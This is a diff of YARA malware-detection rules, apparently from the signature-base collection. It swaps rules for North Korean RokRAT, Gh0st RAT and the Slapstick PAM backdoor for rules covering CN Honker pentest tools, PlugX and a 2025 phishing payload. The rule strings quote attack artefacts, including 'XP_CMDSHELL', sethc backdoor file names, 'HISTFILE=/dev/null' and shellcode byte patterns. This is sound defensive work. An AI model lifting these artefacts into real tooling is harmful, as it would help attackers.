-		logic_hash = "e7e18a6d648b1383706439ba923335ac4396f6b5d2a3dc8f30f63ded7df29eda"
-		score = 75
+		logic_hash = "ed809a5fb35d36b2a8758e470657bda1a04d80577d5129962cd7d0ab9a80cf8a"
+		score = 70
 		quality = 85
-		tags = "INKYSQUID"
-		hash1 = "80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
+		hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
+		hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
+		hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
 
 	strings:
-		$s1 = "\"\".join(chr(ord(" ascii
-		$s2 = "import ctypes " ascii
-		$s3 = "ctypes.CFUNCTYPE(ctypes.c_int)" ascii
-		$s4 = "ctypes.memmove" ascii
-		$s5 = "python ended" ascii
+		$s1 = "zhaoxypass@yahoo.com.cn" fullword ascii
+		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s3 = "ProxyParams.ProxyPort" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Win_Decrok : INKYSQUID
+rule SIGNATURE_BASE_CN_Honker__Wwwscan_Wwwscan_Wwwscan_Gui : FILE
 {
 	meta:
-		description = "The DECROK malware family, which uses the victim's hostname to decrypt and execute an embedded payload."
-		author = "threatintel@volexity.com"
-		id = "dc83843d-fd2a-52f1-82e8-8e36b135a0c5"
-		date = "2021-06-23"
+		description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "02f80151-4dfb-5b14-9145-312a9bd2c609"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L61-L82"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2380-L2398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855"
-		logic_hash = "47fa03e95ac17ba7195858cd63b1769e5d56ab8a5edf872b345989b767050b87"
-		score = 75
+		logic_hash = "0fd6ab38dca839605c1b7cd51a4a8d3268551f0725ccee7c7521f13d6f9e7076"
+		score = 70
 		quality = 85
-		tags = "INKYSQUID"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
+		hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
+		hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
 
 	strings:
-		$v1 = {C7 ?? ?? ?? 01 23 45 67 [2-20] C7 ?? ?? ?? 89 AB CD EF C7 ?? ?? ?? FE DC BA 98}
-		$av1 = "Select * From AntiVirusProduct" wide
-		$av2 = "root\\SecurityCenter2" wide
-		$funcformat = { 25 30 32 78 [0-10] 43 72 65 61 74 65 54 68 72 65 61 64 }
+		$s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+		$s2 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_NK_Scarcruft_RUBY_Shellcode_XOR_Routine : APT
+rule SIGNATURE_BASE_CN_Honker__LPK_LPK_LPK : FILE
 {
 	meta:
-		description = "Detects Ruby ShellCode XOR routine used by ScarCruft APT group"
-		author = "S2WLAB_TALON_JACK2"
-		id = "c393f2db-8ade-5083-9cec-f62f23056f8b"
-		date = "2021-05-20"
+		description = "Sample from CN Honker Pentest Toolset - from files LPK.DAT, LPK.DAT, LPK.DAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1beb88b-d3e8-5868-affb-e59c26e4dc2e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L104-L133"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2400-L2421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a97041a06729d639c22a4ee272cc96555345b692fc0da8b62e898891d02b23ea"
-		score = 75
+		logic_hash = "0309241ed0e899519cf3edd1544a14d09fff4a8162514ae49b3a6b70eda1ed4f"
+		score = 70
 		quality = 85
-		tags = "APT"
-		type = "APT"
-		version = "0.1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "5a1226e73daba516c889328f295e728f07fdf1c3"
+		hash1 = "2b2ab50753006f62965bba83460e3960ca7e1926"
+		hash2 = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
 
 	strings:
-		$hex1 = {C1 C7 0D 40 F6 C7 01 74 ?? 81 F7}
-		$hex2 = {41 C1 C2 0D 41 8B C2 44 8B CA 41 8B CA 41 81 F2}
+		$s1 = "C:\\WINDOWS\\system32\\cmd.exe" fullword wide
+		$s2 = "Password error!" fullword ascii
+		$s3 = "\\sathc.exe" ascii
+		$s4 = "\\sothc.exe" ascii
+		$s5 = "\\lpksethc.bat" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1057KB and all of them
 }
-rule SIGNATURE_BASE_APT_NK_Scarcruft_Evolved_ROKRAT : APT FILE
+rule SIGNATURE_BASE_CN_Honker__Builder_Shift_Skinh : FILE
 {
 	meta:
-		description = "Detects RokRAT malware used by ScarCruft APT group"
-		author = "S2WLAB_TALON_JACK2"
-		id = "53cabf41-0154-5372-b667-60d8a7cb9806"
-		date = "2021-07-09"
+		description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cb18aa4a-6eba-58ca-a6fc-e4160b90f4d7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L135-L179"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2423-L2444"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01a2f410687c943d6c6e421ffacfe42f9e7b6afb82e43ba03a8d525e075a3a3c"
-		score = 75
+		logic_hash = "d15802df98d72b4ef3bac2dfb8ba3338c540ef7290d7ddf9738cf0f7b86e17ea"
+		score = 70
 		quality = 85
-		tags = "APT, FILE"
-		type = "APT"
-		version = "0.1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "6b5a84cdc3d27c435d49de3f68872d015a5aadfc"
+		hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
+		hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
 
 	strings:
-		$AES_IV_KEY = {
-        C7 44 24 ?? 32 31 12 23
-        C7 44 24 ?? 34 45 56 67
-        C7 44 24 ?? 78 89 9A AB
-        C7 44 24 ?? 0C BD CE DF
-        C7 45 ?? 2B 7E A5 16
-        C7 45 ?? 28 AE D2 A6
-        C7 45 ?? AB F7 15 88
-        C7 45 ?? 09 CF 4F 3C
-        }
-		$url_deocde = {
-               80 E9 0F
-               80 F1 C8
-               88 48 ??
-               48 83 EA 01  }
+		$s1 = "lipboard" fullword ascii
+		$s2 = "uxthem" fullword ascii
+		$s3 = "ENIGMA" fullword ascii
+		$s4 = "UtilW0ndow" fullword ascii
+		$s5 = "prog3am" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 6075KB and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1 : FILE
+rule SIGNATURE_BASE_CN_Honker__Lcx_Htran2_4_Htran20 : FILE
 {
 	meta:
-		description = "Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022"
+		description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bc7460f-a1c4-5157-8c2d-34d3a6c9c7e9"
-		date = "2022-03-03"
-		modified = "2022-03-04"
-		reference = "https://twitter.com/cyb3rops/status/1499514240008437762"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nvidia_leaked_cert.yar#L4-L22"
+		id = "c6851e7b-ab64-5578-896e-4d92fb3b2000"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2446-L2465"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e7e9e58ec1e3922471ad3ffd4ad9fbb3ac4b3c3841c35d1cd8886607f3cf1ab9"
+		logic_hash = "30184394ad3ec7bf209bb0a22da889699bac6167ecc09e693c88f8643c754394"
 		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
+		hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
+		hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
+
+	strings:
+		$s1 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s2 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100MB and pe.timestamp > 1646092800 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "VeriSign Class 3 Code Signing 2010 CA" and ( pe.signatures [ i ] . serial == "43:bb:43:7d:60:98:66:28:6d:d8:39:e1:d0:03:09:f5" or pe.signatures [ i ] . serial == "14:78:1b:c8:62:e8:dc:50:3a:55:93:46:f5:dc:c5:18" ) )
+		uint16( 0 ) == 0x5a4d and filesize < 440KB and all of them
 }
-rule SIGNATURE_BASE_MAL_UNC2891_Slapstick : FILE
+rule SIGNATURE_BASE_CN_Honker__D_Injection_V2_32_D_Injection_V2_32_D_Injection_V2_32 : FILE
 {
 	meta:
-		description = "Detects UNC2891 Slapstick pam backdoor"
-		author = "Frank Boldewin (@r3c0nst), slightly modifier by Florian Roth"
-		id = "eb5db507-ac12-5c11-9dd9-ec34b9a80e1c"
-		date = "2022-03-30"
-		modified = "2023-01-05"
-		reference = "https://github.com/fboldewin/YARA-rules/tree/master"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_mal_jan23.yar#L19-L39"
+		description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "79e9cd97-c070-5109-a0a0-bc88eea0dc37"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2467-L2488"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4bc51a47a1b620c3bb950c287c38a37e528e79f9720fb4d9fa9ebecbeca82036"
-		score = 75
+		logic_hash = "5c318c670b3aedf66da1c6444df7d630d2263e88527facfcf75d76dd974e7d31"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
 
 	strings:
-		$code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5}
-		$code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85}
-		$str1 = "/proc/self/exe" fullword ascii
-		$str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii
-		$str3 = "pam_sm_authenticate" ascii
-		$str_fr1 = "HISTFILE=/dev/null"
+		$s1 = "upfile.asp " fullword ascii
+		$s2 = "[wscript.shell]" fullword ascii
+		$s3 = "XP_CMDSHELL" fullword ascii
+		$s4 = "[XP_CMDSHELL]" fullword ascii
+		$s5 = "http://d99net.3322.org" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 4 of them
 }
-rule SIGNATURE_BASE_SUSP_VHD_Suspicious_Small_Size : FILE
+rule SIGNATURE_BASE_Plugx_J16_Gen : FILE
 {
 	meta:
-		description = "Detects suspicious VHD files"
+		description = "Detects PlugX Malware samples from June 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4a72e7b-ddd3-5038-9440-1e81dc27755d"
-		date = "2019-12-21"
-		modified = "2023-01-27"
-		reference = "https://twitter.com/MeltX0R/status/1208095892877774850"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_vhd_anomaly.yar#L2-L28"
+		id = "13ef1e80-7090-5a1e-bca7-8d3de0dc2247"
+		date = "2016-06-08"
+		modified = "2023-12-05"
+		reference = "VT Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_win_plugx.yar#L10-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bd5b113714854feaa89d52d4bab6a4a00f0dcb7fd816fa7b036eb43d3ea0dd8"
-		score = 50
-		quality = 83
+		logic_hash = "3e988243663264b2647e098e36b83dd675141fa9765c9bd47c30f29bf176cd8f"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "3382a75bd959d2194c4b1a8885df93e8770f4ebaeaff441a5180ceadf1656cd9"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$hc1 = { 63 6F 6E 65 63 74 69 78 }
-		$hc2a = { 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F
-               6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F
-               61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20
-               73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F
-               70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D }
-		$hc2b = "connectix"
+		$x1 = "%WINDIR%\\SYSTEM32\\SERVICES.EXE" fullword wide
+		$x2 = "\\\\.\\PIPE\\RUN_AS_USER(%d)" fullword wide
+		$x3 = "LdrLoadShellcode" fullword ascii
+		$x4 = "Protocol:[%4s], Host: [%s:%d], Proxy: [%d:%s:%d:%s:%s]" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\User Agent\\Post Platform" fullword wide
+		$s2 = "%s\\msiexec.exe %d %d" fullword wide
+		$s3 = "l%s\\sysprep\\CRYPTBASE.DLL" fullword wide
+		$s4 = "%s\\msiexec.exe UAC" fullword wide
+		$s5 = "CRYPTBASE.DLL" fullword wide
+		$s6 = "%ALLUSERSPROFILE%\\SxS" fullword wide
+		$s7 = "%s\\sysprep\\sysprep.exe" fullword wide
+		$s8 = "\\\\.\\pipe\\a%d" fullword wide
+		$s9 = "\\\\.\\pipe\\b%d" fullword wide
+		$s10 = "EName:%s,EAddr:0x%p,ECode:0x%p,EAX:%p,EBX:%p,ECX:%p,EDX:%p,ESI:%p,EDI:%p,EBP:%p,ESP:%p,EIP:%p" fullword ascii
+		$s11 = "Mozilla/4.0 (compatible; MSIE " fullword wide
+		$s12 = "; Windows NT %d.%d" fullword wide
+		$s13 = "SOFTWARE\\Microsoft\\Internet Explorer\\Version Vector" fullword wide
+		$s14 = "\\bug.log" wide
 
 	condition:
-		not uint16( 0 ) == 0x5a4d and filesize > 1KB and filesize <= 4000KB and ( $hc1 at 0 or all of ( $hc2* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 8 of them )
 }
-rule SIGNATURE_BASE_Ghostdragon_Gh0Strat : FILE
+rule SIGNATURE_BASE_Plugx_J16_Gen2 : FILE
 {
 	meta:
-		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
+		description = "Detects PlugX Malware Samples from June 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a74330ab-5249-5125-8f48-27aec7c6eeb4"
-		date = "2016-04-23"
+		id = "28e9cbb9-cd60-555d-b033-4e2bf293adf2"
+		date = "2016-06-08"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/the-ghost-dragon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ghostdragon_gh0st_rat.yar#L8-L52"
+		reference = "VT Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_win_plugx.yar#L42-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b67c7ff76c14e771c4e952a408c2c006c9ae88fda97b775747a95322aff355e7"
+		logic_hash = "8fbe90cbff5d408d26b0a5ace6833a0e3100d11ff544184d9ccc2f39ee806de9"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197"
-		hash2 = "99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2"
-		hash3 = "6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df"
-		hash4 = "b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5"
 
 	strings:
-		$x1 = "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"" fullword ascii
-		$x2 = "Global\\REALCHEL_GLOBAL_SUBMIT_20031020_" ascii
-		$x3 = "\\xclolg2.tmp" ascii
-		$x4 = "Http/1.1 403 Forbidden" fullword ascii
-		$x5 = "%sxsd%d.pif" fullword ascii
-		$x6 = "%s\\%s32.dl_" ascii
-		$x7 = "%-23s %-16s  0x%x(%02d)" fullword ascii
-		$x8 = "RegSetValueEx(start)" fullword ascii
-		$x9 = "%s\\%s64.dl_" ascii
-		$s1 = "viewsc.dll" fullword ascii
-		$s2 = "Proxy-Connection:   Keep-Alive" fullword ascii
-		$s3 = "\\sfc_os.dll" ascii
-		$s4 = "Mozilla/4.0 (compatible)" fullword ascii
-		$s5 = "Http/1.1 403 Forbidden" fullword ascii
-		$s6 = "CONNECT   %s:%d   HTTP/1.1" fullword ascii
-		$s7 = "WindowsUpperVersion" fullword ascii
-		$s8 = "[%d-%d-%d %d:%d:%d] (%s)" fullword ascii
-		$s9 = "SOFTWARE\\Microsoft\\DataAccess\\%s" fullword ascii
-		$s10 = "%s sp%d(%d)" fullword ascii
-		$s11 = "OpenSC ERROR " fullword ascii
-		$s12 = "get rgspath error " fullword ascii
-		$s13 = "Global\\GLOBAL_SUBMIT_0234_" ascii
-		$s14 = "Global\\_vc_ck_ %d" fullword ascii
+		$s1 = "XPlugKeyLogger.cpp" fullword ascii
+		$s2 = "XPlugProcess.cpp" fullword ascii
+		$s4 = "XPlgLoader.cpp" fullword ascii
+		$s5 = "XPlugPortMap.cpp" fullword ascii
+		$s8 = "XPlugShell.cpp" fullword ascii
+		$s11 = "file: %s, line: %d, error: [%d]%s" fullword ascii
+		$s12 = "XInstall.cpp" fullword ascii
+		$s13 = "XPlugTelnet.cpp" fullword ascii
+		$s14 = "XInstallUAC.cpp" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 6 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample2 : FILE
+rule SIGNATURE_BASE_MAL_PHISH_Shellcode_Enc_Payload_Feb25 : FILE
 {
 	meta:
-		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "424cb978-c4d1-5847-8852-e25ec2a02139"
-		date = "2016-04-23"
-		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/the-ghost-dragon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ghostdragon_gh0st_rat.yar#L54-L75"
+		description = "Detects unknown of phishing-delivered malware"
+		author = "X__Junior"
+		id = "8459c5ba-37ec-59bd-8d4a-5ab7b6bb4553"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "https://x.com/dtcert/status/1890384162818802135"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f41776a033be766844c9867902d2ef9b79bf59bdf212f0158eccf79db0810460"
-		score = 75
+		hash = "247e6a648bb22d35095ba02ef4af8cfe0a4cdfa25271117414ff2e3a21021886"
+		logic_hash = "144323294a8353956adf7a9b2a316e1e7606e882f85b8187c016d5acdcc254cc"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "71a52058f6b5cef66302c19169f67cf304507b4454cca83e2c36151da8da1d97"
 
 	strings:
-		$x1 = "AdobeWpk" fullword ascii
-		$x2 = "seekin.dll" fullword ascii
-		$c1 = "Windows NT 6.1; Trident/6.0)" fullword ascii
-		$c2 = "Mozilla/5.0 (compatible; MSIE 10.0; " fullword ascii
+		$op1 = { 48 89 EA FF D0 48 89 E9 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 89 C7 48 89 C3 48 89 EA F3 A4 48 89 C1 41 FF D4 31 C9 FF D3}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( all of ( $x* ) or all of ( $c* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and $op1
 }
-rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample3
+rule SIGNATURE_BASE_MAL_PHISH_Final_Payload_Feb25
 {
 	meta:
-		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6d4bb99d-28de-59c2-b6f0-6da3cac4ed73"
-		date = "2016-04-23"
-		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/the-ghost-dragon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ghostdragon_gh0st_rat.yar#L77-L92"
+		description = "Detects possible final payload of phishing-delivered malware, where embedded shellcode is used to decrypt and execute the payload after user-supplied password input."
+		author = "X__Junior"
+		id = "9014e1f2-09c2-5ba0-8b7c-6ae8c069d1f7"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "https://x.com/dtcert/status/1890384162818802135"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L16-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39ddb94ac14032f88e54e413ed650277e95f6dcf66219fcf43a01aff1f10a058"
-		score = 75
+		hash = "de384aba6b0c6800095eb530954aa718d4ed96cccfc0b1e5e4d01404f3518a77"
+		logic_hash = "3251d68a019d873987966d46c9e474e5a1ebbca4a33a8bf1e3c3ce119db8ab8c"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1be9c68b31247357328596a388010c9cfffadcb6e9841fb22de8b0dc2d161c42"
 
 	strings:
-		$op1 = { 44 24 15 65 88 54 24 16 c6 44 24 }
-		$op2 = { 44 24 1b 43 c6 44 24 1c 75 88 54 24 1e }
-		$op3 = { 1e 79 c6 44 24 1f 43 c6 44 24 20 75 88 54 24 22 }
+		$s1 = "%lu: %s %s" wide
+		$s2 = "(Direct Inbound)" wide
+		$s3 = "(Primary Domain)" wide
+		$s4 = "(Forest Tree Root" wide
+		$s5 = "(Native Mode)" wide
+		$s6 = "(In Forest)" wide
+		$s7 = "(None)" wide
 
 	condition:
 		all of them
 }
-
-rule SIGNATURE_BASE_Susp_File_Enumerator_With_Encrypted_Resource_101 : FILE
+rule SIGNATURE_BASE_SUSP_Sysinternals_Desktops_Anomaly_Feb25 : FILE
 {
 	meta:
-		description = "Generic detection for samples that enumerate files with encrypted resource called 101"
-		author = "Kaspersky Lab"
-		id = "9bc16ec2-c94c-54f5-b09c-88a78e9e3fb2"
-		date = "2026-01-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L12-L41"
+		description = "Detects anomalies in Sysinternals Desktops binaries"
+		author = "Florian Roth"
+		id = "5a586222-9263-5079-be48-9cfa464440d4"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L37-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2cd0a5f1e9bcce6807e57ec8477d222a"
-		hash = "c843046e54b755ec63ccb09d0a689674"
-		logic_hash = "0a207038b3cbba88d05cd6a053fd14337ac1fbb08b2a532b542ee2bb6b881a5a"
-		score = 65
-		quality = 44
+		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
+		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
+		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
+		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
+		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
+		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
+		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
+		logic_hash = "e17b831c9644cfe6a4c82537a01cb937007308d94eb2b78f97f5fbad3546404a"
+		score = 70
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$mz = "This program cannot be run in DOS mode."
-		$a1 = "FindFirstFile" ascii wide nocase
-		$a2 = "FindNextFile" ascii wide nocase
-		$a3 = "FindResource" ascii wide nocase
-		$a4 = "LoadResource" ascii wide nocase
+		$s1 = "Software\\Sysinternals\\Desktops" wide fullword
+		$s2 = "Sysinternals Desktops" wide fullword
+		$s3 = "http://www.sysinternals.com" wide fullword
 
